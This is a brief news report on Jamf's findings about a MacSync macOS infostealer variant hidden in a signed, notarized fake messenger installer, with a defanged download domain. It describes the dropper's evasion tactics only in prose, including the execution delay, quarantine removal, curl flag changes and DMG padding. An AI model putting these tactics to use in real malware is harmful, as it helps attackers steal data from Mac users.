- MacSync has a new variant delivered inside a code-signed, notarized Swift app in a DMG file hosted on zkcall[.]net/download.
- The installer bypassed macOS protections by using a signed, notarized bundle and user prompts; Apple has revoked the signing certificate.
- The Swift dropper enforces checks (connectivity, a ~3600‑second delay, quarantine removal) and fetches a Base64 payload decoded into the MacSync stealer.
- Attackers used evasion tactics such as unusual curl flags, dynamic variables, and an inflated 25.5 MB DMG containing unrelated PDFs.
On Dec. 24, 2025, researchers at Jamf reported a new macOS information stealer variant delivered as a digitally signed, notarized Swift application inside a disk image named “zk-call-messenger-installer-3.9.2-lts.dmg” hosted at zkcall[.]net/download. The Malware impersonated a messaging installer to evade Apple protections; Apple has since revoked the code‑signing certificate. According to Jamf researcher Thijs Xhaflaire, this sample uses a more deceptive, hands‑off method than prior MacSync variants.
The Swift dropper performs multiple runtime checks before executing the payload. It verifies internet connectivity, enforces about a 3600‑second minimum execution interval, removes quarantine attributes, and validates files prior to launch. The dropper retrieves an encoded script via a helper component and decodes a Base64 payload that corresponds to MacSync.
“Notably, the curl command used to retrieve the payload shows clear deviations from earlier variants,” wrote the researcher, noting the use of split flags (-fL and -sS) and additional options like –noproxy (source). The changes and use of dynamically populated variables suggest altered fetching and validation behavior.
The decoded payload links MacSync to a rebranded form of Mac.c, and researchers at Moonlock Lab note that MacSync includes a Go‑based agent enabling remote command‑and‑control capabilities. Attackers also inflated the DMG to about 25.5 MB by embedding unrelated PDF files as an evasion tactic.
Definitions: Gatekeeper — Apple’s app verification feature that checks code signing and notarization. Notarized — a process where Apple scans an app for known malware and issues a notarization ticket. DMG — a macOS disk image file used to distribute software. Base64 — an encoding method that converts binary data to ASCII text for transport.
Similar tactics have been observed elsewhere: code‑signed DMGs mimicking Google Meet have carried other stealers such as Odyssey, while some campaigns still use unsigned images to deliver malware like DigitStealer. “This shift in distribution reflects a broader trend across the macOS malware landscape, where attackers increasingly attempt to sneak their malware into executables that are signed and notarized, allowing them to look more like legitimate applications,” the researchers stated (source).
✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.
Previous Articles:
- Gnosis Chain hard fork recovers $9M, sparks governance rift.
- XRP Social Sentiment Falls to ‘Fear Zone’ — Rally Likely Now
- eXRD Now Tradable on Coinbase via Base, Bridging Radix Today
- AI-driven Nomani scam surges 62% spreads across social media
- XRP Falls but Could Rally to $5 After ETF and Bank Adoption.
